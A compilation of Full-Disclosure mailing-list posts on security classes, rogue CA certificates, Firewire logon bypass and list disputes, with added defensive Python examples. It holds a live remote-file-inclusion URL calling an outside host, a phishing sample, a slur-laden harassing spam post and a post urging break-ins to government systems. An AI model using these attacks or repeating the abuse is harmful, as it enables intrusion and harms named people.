[Full-disclosure] OpenSecurityTraining Intel VT-x class
We're now mirroring the content for David Weinstein's x86 virtualization training class. This class teaches how to write a toy virtual machine monitor (VMM) while showing how the famous BluePill and Vitriol attacks are possible. The class is designed with particular focus on a Windows 7 x64 system, but towards the end it discusses creating a container for real-mode (BIOS code) execution inside a toy Linux VMM (accessible via /dev/vmm once the kernel module is loaded). The concepts are introduced first with some historical perspective and fundamentals, followed by doing a deep technical dive, and finally talking about detection techniques/countermeasures in the last part. http://OpenSecurityTraining.info/AdvancedX86-VTX.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenSecurityTraining Exploits 2 class
We have just released the class materials and first day of videos from Corey K's three-day Exploits 2 class. This class focuses on Windows and its exploit mitigations, whereas the previous Exploits 1 class focused on Linux. http://OpenSecurityTraining.info/Exploits2.html We also offer classes on x86 assembly and the PE binary format for those who do not already have backgrounds in those areas. http://OpenSecurityTraining.info/Training.html The OST Team
[Full-disclosure] The Mystery of the Duqu Framework
http://www.securelist.com/en/blog/667/The_Mystery_of_the_Duqu_Framework Haven't seen this (or much discussion around this) here yet, so I figured I'd share. -- -Joe.
[Full-disclosure] (USA) Fighting the tyranny of fusion centers / JTTF harassment and profiling
Was wondering what FD's opinions were on fusion centers. www.aclu.org/fusion

They are essentially COINTELPRO surveillance techniques employed by the FBI-State-Local police to gather intelligence on people. And yeah, you guys fall into the scope. I was wondering what your opinions were on this government surveillance stuff. Do your local police (turned domestic intelligence agents) have the sophistication and complexity to understand what you do? Or do you think you'll end up like Ricardo Calixte, and get raided for using Linux. http://www.eff.org/deeplinks/2009/04/boston-college-prompt-commands-are-suspicious

I was wondering what you thought about abuse of power by the government. And how to stop it. I think that cryptome and wikileaks is the way to go. If you see the government doing something illegal, do you have the right to break into their system and uncover the evidence? Google plain sight rule. Sure, if it's not that you'll probably go to jail, but if you hit the gold mine of their corruption, you're set. Freedom of information? COINTELPRO was owned by citizen's investigation into the FBI. It was illegal to search the FBI office. However, it offered a sweeping change in legislative policy after, since the evidence could be shown in congress.

Where are all the upset feds? Blow the whistle. You can get your info out 100% safe, Get TOR (http://www.torproject.org/). Post your stories on this list, Wikileaks or Cryptome.

This post was sponsored heavily by n3td3v intelligence ~~ n3td3v is not antisec. the metasploit method is ineffective. ~~ you need to get the intelligence feed at www.twitter.com/n3td3v.
[Full-disclosure] Full Disclosure Top List
The top list of people posting to fd (although people like n3td3v have several aliases and are listed several times).

+---------------------------------------------------+
| Top List For: January_2009                        |
+-----+--------+------------------------------------+
| nr. | posts. | user.                              |
+-----+--------+------------------------------------+
| 1   | 88     | n3td3v,andrew.wallace,sexyazngrl69 |
| 2   | 41     | Ureleet                            |
| 3   | 39     | Avraham_Schneider                  |
| 4   | 34     | j-f_sentier                        |
| 5   | 19     | Valdis.Kletnieks_at_vt.edu         |
| 6   | 17     | Biz_Marqee                         |
| 7   | 14     | Paul_Schmehl                       |
| 8   | 11     | Mainbox_Notif                      |
| 9   | 11     | James_Matthews                     |
| 10  | 10     | Ed_Carp                            |
+-----+--------+------------------------------------+

+---------------------------------------------------+
| Top List For: December_2008                       |
+-----+--------+------------------------------------+
| nr. | posts. | user.                              |
+-----+--------+------------------------------------+
| 1   | 78     | Ureleet                            |
| 2   | 76     | n3td3v                             |
| 3   | 26     | Valdis.Kletnieks_at_vt.edu         |
| 4   | 25     | James_Matthews                     |
| 5   | 22     | j-f_sentier                        |
| 6   | 17     | Elazar_Broad                       |
| 7   | 15     | Bipin_Gautam                       |
| 8   | 12     | zdi-disclosures_at_3com.com        |
| 9   | 12     | security_at_mandriva.com           |
| 10  | 12     | Mike_C                             |
+-----+--------+------------------------------------+

+---------------------------------------------------+
| Top List For: November_2008                       |
+-----+--------+------------------------------------+
| nr. | posts. | user.                              |
+-----+--------+------------------------------------+
| 1   | 112    | n3td3v                             |
| 2   | 61     | Ureleet                            |
| 3   | 35     | Valdis.Kletnieks_at_vt.edu         |
| 4   | 30     | adrian.lamo_at_hushmail.com        |
| 5   | 22     | James_Matthews                     |
| 6   | 21     | Trollie_Fingers                    |
| 7   | 18     | Mike_C                             |
| 8   | 15     | vulcanius                          |
| 9   | 15     | security_at_mandriva.com           |
| 10  | 14     | Fredrick_Diggle                    |
+-----+--------+------------------------------------+

I believe that n3td3v is trying to destroy this list so that his history here somehow magically disappears, this will not happen of course because what gets posted to the Internet stays on the Internet and is available for future employers to see for all eternity.

## In case someone else wants to use this script: ##

#!/bin/bash
LIST_SIZE=13

function _get() {
    MONTH="$2.txt"
    URL="$1"
    wget "$URL" -O "$MONTH" 1>/dev/null 2>/dev/null
    # ignore if name contains quotations etc.

    # Table frame. The border strings are kept as they survive in the
    # archived copy, which has lost their original run lengths.
    echo ".."
    echo -n "| Top List For: $2"
    let S=37-$(echo "$2" | wc -c)
    for space in $(seq 0 $S); do echo -n " "; done
    echo "|"
    echo "+.--.+"
    echo "| nr. | posts. | user. |"
    echo "++--++"

    # Author lines in the pipermail index start with "<I>". The pattern is
    # an assumption: the archived copy lost it, and the sed below strips
    # exactly three leading characters. ":" joins count and name so that
    # each entry survives word splitting in the for loop.
    PRE=$(cat "$MONTH" | grep "<I>" | sed -e 's/^...//g' -e 's/ /_/g' | sort | uniq -c | sort -rn | head -n $LIST_SIZE | sed -e 's/^[ \t]*//g' -e 's/ /:/g')
    COUNT=1
    for CURRENT in $(echo $PRE); do
        declare -a ITEMS=($(echo $CURRENT | sed 's/:/ /g'))
        # format nr col
        echo -n "| $COUNT"
        let S=6-$(echo $COUNT | wc -c)
        for space in $(seq 0 $S); do echo -n " "; done
        # format posts. col.
        echo -n "| ${ITEMS[0]}"
        let S=8-$(echo ${ITEMS[0]} | wc -c)
        for space in $(seq 0 $S); do echo -n " "; done
        echo -n "| "
        # format user col. (truncate before printing so the row stays aligned)
        if [ $(echo ${ITEMS[1]} | wc -c) -gt 28 ]; then
            ITEMS[1]=$(echo ${ITEMS[1]} | sed 's/\(^.\{,28\}\).*$/\1/g')
        fi
        echo -n "${ITEMS[1]}"
        let S=28-$(echo ${ITEMS[1]} | wc -c)
        for space in $(seq 0 $S); do echo -n " "; done
        echo " |"
        let COUNT=$COUNT+1
    done
    echo "''--''"
}

_get "http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/author.html" January_2009
echo; echo
# _get   (the archived message is cut off at this call)
Re: [Full-disclosure] Creating a rogue CA certificate
-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of j...@slave-tothe-box.net
Sent: Tuesday, December 30, 2008 3:17 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Creating a rogue CA certificate

SSL/PKI is only as strong as the weakest CA... For those of you who haven't been following this, here you go:

http://www.win.tue.nl/hashclash/rogue-ca/
http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt

Enjoy and Happy New Years!

elazar

From Microsoft: http://www.microsoft.com/technet/security/advisory/961509.mspx

> Microsoft is not aware of specific attacks against MD5, so previously issued certificates that were signed using MD5 are not affected and do not need to be revoked. This issue only affects certificates being signed using MD5 after the publication of the attack method.

I take it the above is incorrect?

James

No it is correct because the attack creates a new CA from the compromised cert which is then used to sign certs, it doesn't involve copying the signatures of certs that already have been signed by legit CAs with the exception of the one that is used to create the rogue CA
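The exchange above turns on which certificates carry an MD5-based signature. The following is an added example, not part of the original posts: a standard-library DER walker that reads a certificate's signature algorithm so a store can be inventoried for MD5-signed entries. The function names and the `sample_cert` skeleton (constructed test input with the outer layout of a certificate, not a real certificate) are assumptions made for this illustration.

```python
# Added example: read the signature algorithm of a DER-encoded X.509 certificate.
WEAK_SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.2": "md2WithRSAEncryption",
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
}

def read_tlv(buf, pos):
    """Return (tag, value_start, value_end) of the DER element at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                      # short form length
        length = first
    else:                                 # long form: next n bytes hold the length
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("DER element runs past end of input")
    return tag, pos, pos + length

def decode_oid(body):
    """Decode OBJECT IDENTIFIER content bytes to dotted notation."""
    if not body:
        raise ValueError("empty OID")
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                  # high bit clear ends this arc
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)

def algorithm_oid(buf, pos):
    """Decode the OID of the AlgorithmIdentifier SEQUENCE starting at pos."""
    tag, start, end = read_tlv(buf, pos)
    if tag != 0x30:
        raise ValueError("expected AlgorithmIdentifier SEQUENCE")
    tag, o_start, o_end = read_tlv(buf, start)
    if tag != 0x06 or o_end > end:
        raise ValueError("expected OBJECT IDENTIFIER")
    return decode_oid(buf[o_start:o_end])

def signature_oids(cert_der):
    """Return (outer signatureAlgorithm, tbsCertificate.signature) OIDs."""
    tag, start, end = read_tlv(cert_der, 0)            # Certificate
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    tag, tbs_start, tbs_end = read_tlv(cert_der, start)  # tbsCertificate
    if tag != 0x30 or tbs_end > end:
        raise ValueError("malformed tbsCertificate")
    outer = algorithm_oid(cert_der, tbs_end)
    tag, _, nxt = read_tlv(cert_der, tbs_start)
    if tag == 0xA0:                                    # optional [0] version
        tag, _, nxt = read_tlv(cert_der, nxt)
    if tag != 0x02:
        raise ValueError("expected serialNumber INTEGER")
    return outer, algorithm_oid(cert_der, nxt)

def audit(cert_der):
    """Return 'mismatch', the weak algorithm's name, or 'ok'."""
    outer, inner = signature_oids(cert_der)
    if outer != inner:
        return "mismatch"
    return WEAK_SIGNATURE_OIDS.get(outer, "ok")

# --- constructed test input -------------------------------------------------
def der(tag, body):
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    size = (n.bit_length() + 7) // 8
    return bytes([tag, 0x80 | size]) + n.to_bytes(size, "big") + body

def encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)

def sample_cert(outer_oid, inner_oid=None):
    """Constructed skeleton with a certificate's outer layout (not a real cert)."""
    def alg(oid):
        return der(0x30, der(0x06, encode_oid(oid)) + der(0x05, b""))
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01")
              + alg(inner_oid or outer_oid) + der(0x04, bytes(200)))
    return der(0x30, tbs + alg(outer_oid) + der(0x03, b"\x00" + bytes(16)))

if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.4", "1.2.840.113549.1.1.11"):
        print(oid, "->", audit(sample_cert(oid)))
```

`audit` takes raw DER bytes, so a PEM file has to be base64-decoded first.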
Re: [Full-disclosure] Firewire Attack on Windows Vista
> How much should the average user worry about this? Not very much. Most notebooks from average users don't even have Firewire on them and you would have an easier time cracking them with a dictionary attack on the password and other such things, which means that this attack makes you no more vulnerable to compromise if you've already granted physical access than you were before.

you don't need a firewire port on your laptop, a pcmcia slot is enough where an attacker inserts a firewire card. but still.. it's a physical access attack..

regarding your other email:

> OK, I guess I misunderstood the original paper (http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf). It now looks to me like they are claiming they can disable password authentication *even while the system is not logged on* - do I have that right?

yes, if the system is off and you can turn it on (e.g. no bios or hdd encryption passwords) you can bypass the logon screen. this is because the tool searches for the function MsvpPasswordValidate in memory and patches it to allow any password.

FD
[Full-disclosure] [EMAIL PROTECTED] likes spam (but does spam like [EMAIL PROTECTED])
It's true. I like spam. And one of the best ways to get spam is to post to a public security list which is mirrored all over the place (at least in my experience ;)). That's why myself and [EMAIL PROTECTED] are teaming up to get great gobs of spam. It's all in the interest of tracking bots of course...just need to cast a wide net :)

Aaron

p.s. <a href="mailto:[EMAIL PROTECTED]">[EMAIL PROTECTED]</a> <a href="mailto:[EMAIL PROTECTED]">[EMAIL PROTECTED]</a> ;)

p.p.s. n3td3v was doing the same thing, I'm just lazier than her ;)
Re: [Full-disclosure] SinFP OS fingerprinting online demo
Sorry, I forgot to mention that a benchmark versus Nmap has been done by someone on his blog: http://www.computerdefense.org/?p=173

--
http://www.GomoR.org/
Systems Security Engineer
zsh$ alias psed='perl -pe '
Net::Frame = http://search.cpan.org/~gomor/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Forensics help - Outgoing email
Hello, I have a Windows 2000 Professional as my primary workstation. I have pretty much all sorts of assorted programs and applications on this Windows system. The Anti-Virus software on my system is the free version of AVG from Grisoft. Recently, I was introduced to the torrent network (primarily because I wanted to download some Linux distros). My curiosity made me download other audio torrents to see the efficiency of the torrent network. One thing I have noticed on my system is that there is an email being sent out periodically to some system (247.16.delicado.com.uy). When the email is being sent out, the AVG Anti Virus is scanning the email, which is how I found out about the delicado.com.uy system. I do not know what is being sent out. Can the torrent files compromise security on your system? Has my system been compromised and become part of a bot network? How do I find out what is causing this email to go out? How do I fix this problem? Any help is much appreciated. Thank you in advance. Regards, Subba Rao
[Full-disclosure] [ADVISORY] | x Thu Mar 16 21:06:20 EST 2006 x | Buffer Overflow in Microsoft PowerPoint
[ADVISORY] | x Thu Mar 16 21:06:20 EST 2006 x | Buffer Overflow in Microsoft PowerPoint +++ Background There is no background commentary about the problem identified. +++ Workaround There were no identified workarounds. +++ CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-282768 to this issue +++ Contact DanB-FD [EMAIL PROTECTED] CISSP GSAE CCE CEH CSFA SSP-CNSA GIPS GWAS CAP SSCP
Re: [Full-disclosure] New site with 0day xploits
Fortinet Research wrote: i found some new unpatched xploits here: http://djloci.gnationnid.com/?xx SPAMMER. This is a retail link, don't bother visiting it! No 0day here! DanBUK
Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
Hi, Dan B UK wrote: Due to the nature of the issue I am not disclosing the detail of it until the writer of the software has updated it; maybe you could have waited?? A vulnerability that allows privileges of the apache user within the limitations of how much PHP has been locked down. Since the author of the product has got back to me with the following I think it is ok to disclose the issue now. That is a known error. Unfortunately I have completely abandoned ashnews. In fact, I have been neglecting taking it down completely which I am going to do right now. - Derek The issue is in the handling of the $pathtoashnews, it is not validated before being used by the script. Allowing remote or local file inclusion. eg: http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc? ( The ? is required to make the remote server (f-box.org) ignore the string that is appended to the variable $pathtoashnews ) ( The website that is in the example above has already been defaced! ) Cheers, DanB UK.
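The following is an added example, not part of the post above and not ashnews code: a log check that flags requests putting a URL, stream wrapper or traversal path into a parameter the application passes to include. The log lines, addresses and host names are constructed, and the watchlist holding only `pathtoashnews` is an assumption to extend per application.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the application feeds into include()/require().
# "pathtoashnews" is the one named in the post; the set itself is an assumption.
INCLUDE_PARAMS = {"pathtoashnews"}

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# URL schemes and PHP stream wrappers that turn an include path into remote input.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp|php|data|expect)\s*:", re.I)

# Constructed sample log lines (documentation addresses, reserved host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Mar/2006:21:06:20 +0000] "GET /news/ashnews.php?pathtoashnews=http://host.example/inc.inc? HTTP/1.1" 200 512',
    '192.0.2.11 - - [16/Mar/2006:21:07:01 +0000] "GET /news/ashnews.php?id=4 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [16/Mar/2006:21:08:44 +0000] "GET /news/ashnews.php?pathtoashnews=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 90',
    '192.0.2.13 - - [16/Mar/2006:21:09:02 +0000] "GET /news/ashnews.php?pathtoashnews=HTTPS%3A%2F%2Fhost.example%2Fx.txt HTTP/1.1" 200 90',
    '192.0.2.14 - - [16/Mar/2006:21:09:30 +0000] "GET /news/ashnews.php?pathtoashnews=ashnews%2F HTTP/1.1" 200 2048',
]


def classify(value):
    """Return a finding label for one decoded parameter value, or None."""
    if REMOTE_RE.match(value):
        # A trailing "?" makes the remote server treat whatever the script
        # appends to the variable as a query string, as the post explains.
        if value.endswith("?"):
            return "remote-include+suffix-strip"
        return "remote-include"
    if "\x00" in value:
        return "nul-truncation"
    if value.startswith("/") or ".." in value.replace("\\", "/").split("/"):
        return "local-include"
    return None


def scan(lines, params=INCLUDE_PARAMS):
    """Return (line number, client, parameter, label) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes, so encoded schemes and slashes are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in params:
                label = classify(value)
                if label:
                    findings.append((number, line.split()[0], name, label))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit on a watched parameter means the request reached the script; the fix on the application side is to stop taking the include path from the request at all.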
Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
Hi, George A. Theall wrote: Is this different from what Phil Dunn reported 2.5 years ago? http://www.securityfocus.com/archive/1/329910 Indeed this is no different. My apologies; I didn't do any searching beforehand. I made an assumption! My mistake! Cheers, Dan.
Re: [Full-disclosure] Rogue Network Link Detection
Hi, H D Moore wrote: I found an old document and some crappy perl code on my system, figured someone might find it interesting: I wouldn't say crappy. Indeed this is quite a handy little tool. I quickly discovered that I can now spoof traffic using our 3rd party's Data Center servers for approx 15 different IPs. (I also discovered that ALL of our VoIP phones can be used as a gateway out... Not necessarily for spoofing but to circumvent firewall rules in place for the Data subnets...) Also allows me to double check that the changes they made to our managed firewalls are in effect at each site. Cheers, DanBUK
Re: [Full-disclosure] Third issue of the Zone-H Comics
On Tue, 27 Sep 2005, str0ke wrote: If we were to say zone-h sucks then we would also state that attrition does since they did the exact thing. (which attrition doesn't suck). Just in case anyone else needed to do the same. str0ke, which did you mean? [dictionary.com] attrition Audio pronunciation of attrition ( P ) Pronunciation Key (uh-trshn)n. 1. A rubbing away or wearing down by friction. 2. A gradual diminution in number or strength because of constant stress. 3. A gradual, natural reduction in membership or personnel, as through retirement, resignation, or death. 4. Repentance for sin motivated by fear of punishment rather than by love of God. /str0ke On 9/27/05, Richard Horsman [EMAIL PROTECTED] wrote: n3td3v, I would compare zone-h more to a newspaper than a terrorists site. Newspapers report what is happening in the world whether it's good news or bad news. Zone-h brings news about defacements and other security related issues, it does not encourage defacements. Richh -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: 27 September 2005 17:10 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Third issue of the Zone-H Comics Hi, I have reviewed your site and it sucks. Looks like you're trying to encourage the activity of webpage defacement and bringing celebrity status to those who can deface/ submit the most defacements. You make it look legal by saying the site is useful for research, but really, we all know it encourages the malicious kids who submit to the site. I don't know why the security services in the U.S haven't closed you down. Your site is in comparison to asking terrorist bombers to post suicide bombing videos to a website and asking you to look at it. The only difference here is, Zone-H is about cyber terrorism, rather than terrorism in the real world. Do the U.S security services take cyber terrorism as seriously as real world terrorism? And if they do, Why is Zone-H still online? 
A journalist should ask that question at Bush's next news conference. Also: Are Zone-H admins about to expand the website to allow for suicide bombing videos, or is that different from the cyber terrorism that your site currently supports. And if you don't support cyber terrorism, then why is Zone-H online and why are you an admin of Zone-H.org That's all for now, Thanks, n3td3v On 9/27/05, Gerardo 'Astharot' Di Giacomo [EMAIL PROTECTED] wrote: Hello, http://www.zone-h.org Gerardo 'Astharot' Di Giacomo - Zone-H Admin -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] Re: Re: in-line coax monitoring device
On Tue, 27 Sep 2005, Dave Korn wrote: Dave Korn [EMAIL PROTECTED] wrote: From: Alex Krycek ...looking for an in-line coax monitoring device that will give me the ability to monitor/capture and decode all traffic The device you are looking for does exist. It's called a cable modem. Even simpler: it's the T-shaped BNC coax adapter you use to connect a PC to the coax network. No it isn't. Do you really think it's possible to broadcast two hundred channels of video plus supply broadband IP access to a couple of hundred people over a single 10Mb/s 10-BASE-T ethernet line of the kind that has been obsolete for the best part of a decade? Yeah, that and BNC is much different than RG58 ... That's not an ethernet on that wire. cheers, DaveK -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] CORE-Impact license bypass
On Tue, 27 Sep 2005, Bernhard Mueller wrote: Exibar wrote: I didn't mean to imply that the consultants create their own exploits, not many I know could even begin to do that, only a couple are talented enough to do just that. Even for those very few, it's just not feasible from a time perspective. Much quicker and cost effective to use what's out there. so what use is a pentest if the consultant isn't even talented enough to find / create exploits for unknown vulnerabilities? any average admin can install and run an automatic security scanner. furthermore, a common nessus report contains 99% useless garbage. and most of the time, you can not apply generic exploits like these from metasploit to a specific customer situation. It should also be noted that many security flaws in Customer networks are in design and therefore implementation. The real issue comes down to client-side security. Most pentests are trivial after an attack from Eve, even if the first person she emails in the organization sees through it ... X-From: Eve From: Bob Hi Alice! Can you get me a quote for the parts we need in the attached spreadsheet? Thank you! -Bob Attachment:parts.xls.exe --Eric
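The following is an added example, not part of the post above: a mail-gateway style check for the two signals in Eric's sample message, a visible From that does not match the sending path and an attachment whose real extension is executable behind a document-looking one. Using Return-Path as the stand-in for the post's "X-From", the addresses, and the extension lists are assumptions; the message is constructed.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr

# Extension lists are illustrative assumptions, not a complete policy.
EXECUTABLE = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "vbs", "lnk", "hta"}
DECOY = {"xls", "xlsx", "doc", "docx", "pdf", "txt", "jpg", "png", "zip"}


def check_name(filename):
    """Classify an attachment name as 'double-extension', 'executable' or None."""
    # Windows ignores trailing dots and spaces, so drop them before splitting.
    name = filename.strip().rstrip(". ").lower()
    parts = [p.strip() for p in name.split(".")]
    if len(parts) < 2 or parts[-1] not in EXECUTABLE:
        return None
    if len(parts) >= 3 and parts[-2] in DECOY:
        return "double-extension"
    return "executable"


def domain_of(header_value):
    """Lower-cased domain of the address in a header value, or '' if absent."""
    address = parseaddr(str(header_value or ""))[1]
    return address.rpartition("@")[2].lower()


def analyse(raw):
    """Return sender and attachment findings for one raw RFC 5322 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    visible = domain_of(msg["From"])
    envelope = domain_of(msg["Return-Path"])
    attachments = []
    for part in msg.walk():
        filename = part.get_filename()
        if filename:
            verdict = check_name(filename)
            if verdict:
                attachments.append((filename, verdict))
    return {
        # Only meaningful when the gateway recorded a Return-Path.
        "sender_mismatch": bool(envelope) and envelope != visible,
        "attachments": attachments,
    }


def build_sample():
    """Constructed message modelled on the one in the post."""
    msg = EmailMessage()
    msg["Return-Path"] = "<eve@mailer.example>"
    msg["From"] = "Bob <bob@corp.example>"
    msg["To"] = "alice@corp.example"
    msg["Subject"] = "Parts quote"
    msg.set_content("Hi Alice! Can you get me a quote for the parts we need "
                    "in the attached spreadsheet? Thank you! -Bob")
    msg.add_attachment(b"MZ", maintype="application",
                       subtype="octet-stream", filename="parts.xls.exe")
    return msg.as_bytes()


if __name__ == "__main__":
    print(analyse(build_sample()))
```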
RE: [Full-disclosure] Search Results w/Trojan?
On Fri, 16 Sep 2005, 'FoR ReaLz' E. Balansay wrote: On Fri, 16 Sep 2005, Madison, Marc wrote: What Trojan does McAfee report? Exploit-URLSpoof.gen See the %00? That is probably what mcafee calls an Exploit-URLSpoof.gen. I would hardly call it a trojan ... still, it is interesting to see this show up in a googling. [EMAIL PROTECTED]/zforen/sec/m/sec-112130-8756.html -Eric McAfee link: http://vil.nai.com/vil/content/v_100927.htm Goodbye! Edgardo -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25
On Wed, 14 Sep 2005, Peer Janssen wrote: I never found information about the following recurrent question of mine either: If I plug in an USB storage device, it has a /dev/sg... assigned to it. But which one? I need to know this mapping in order to mount it. I always deduce this device's name from the syslog, which works but is a bit of a PITA, so I always wondered if there is no other way to get this info, namely something like lsusb. lsusb, which would be the logical place to look for it, doesn't give away this info, at least not in an easily recognizable form (e.g. I never figured it out). sg_scan and such didn't do the trick for me either, although I might have missed something here. Write your own lssd? echo 'dmesg | grep sd[abcdefg]' > /bin/lssd ; chmod 755 /bin/lssd -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
Re: [Full-disclosure] Exploiting an online store
On Wed, 14 Sep 2005, Josh perrymon wrote: I was reading an article about an attacker that could have changed a price in an online shopping cart- Snip Next, Reshef performed a little number he calls ``electronic shoplifting'': He edited the site's online order form to reduce the price of a book from $22.95 to $2.95. Had he gone a few steps farther, Reshef actually could have purchased the book for the reduced price, adding a whole new spin to Priceline.com's ``name-your-own-price'' marketing campaign. Reshef's exploits didn't require any sophisticated software or particularly detailed knowledge of computer code. ``The only thing you need is an HTML editor that comes bundled with your Netscape or Internet Explorer browser,'' he said. ``There is no magic to this.'' --- There is no client side security. Period. Who wrote the shopping cart and allowed posting the price to it?? Wow ... -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770
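The following is an added example, not part of the post above and not code from any shopping cart: an order handler that takes the price from the server's own catalogue and treats a posted price only as a tamper signal, plus an HMAC-signed quote for the case where a price has to travel through the browser. The signed quote goes beyond what the post describes; the SKU, key and field names are constructed.

```python
import hashlib
import hmac
from decimal import Decimal, InvalidOperation

# Constructed catalogue; the 22.95 price is the figure quoted in the article.
CATALOGUE = {"book-1001": Decimal("22.95")}
# Constructed key for the demo; a real key lives in server-side secret storage.
SECRET = b"constructed-demo-key"


class OrderError(ValueError):
    """Raised when the submitted form cannot be turned into an order."""


def price_order(form):
    """Price an order from server-side data; never from form['price']."""
    sku = form.get("sku", "")
    if sku not in CATALOGUE:
        raise OrderError("unknown item")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise OrderError("quantity is not a number")
    if not 1 <= qty <= 99:
        raise OrderError("quantity out of range")
    unit = CATALOGUE[sku]
    mismatch = False
    if "price" in form:
        # The posted price is compared for logging only, never used in the total.
        try:
            mismatch = Decimal(form["price"]) != unit
        except InvalidOperation:
            mismatch = True
    return {"sku": sku, "qty": qty, "unit_price": unit,
            "total": unit * qty, "client_price_mismatch": mismatch}


def sign_quote(sku, price, expires):
    """Issue 'sku|price|expires|mac' for a price that must pass through the client."""
    body = f"{sku}|{price}|{expires}"
    mac = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{mac}"


def verify_quote(token, now):
    """Return (sku, price) if the token is authentic and unexpired, else None."""
    try:
        sku, price, expires, mac = token.split("|")
        expected = sign_quote(sku, price, expires).rsplit("|", 1)[1]
        if not hmac.compare_digest(mac, expected) or int(expires) < now:
            return None
        return sku, Decimal(price)
    except (ValueError, TypeError, InvalidOperation):
        return None


if __name__ == "__main__":
    # The edited form from the article: price lowered from 22.95 to 2.95.
    print(price_order({"sku": "book-1001", "qty": "1", "price": "2.95"}))
```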
Re: [Full-disclosure] NUL Character Evasion
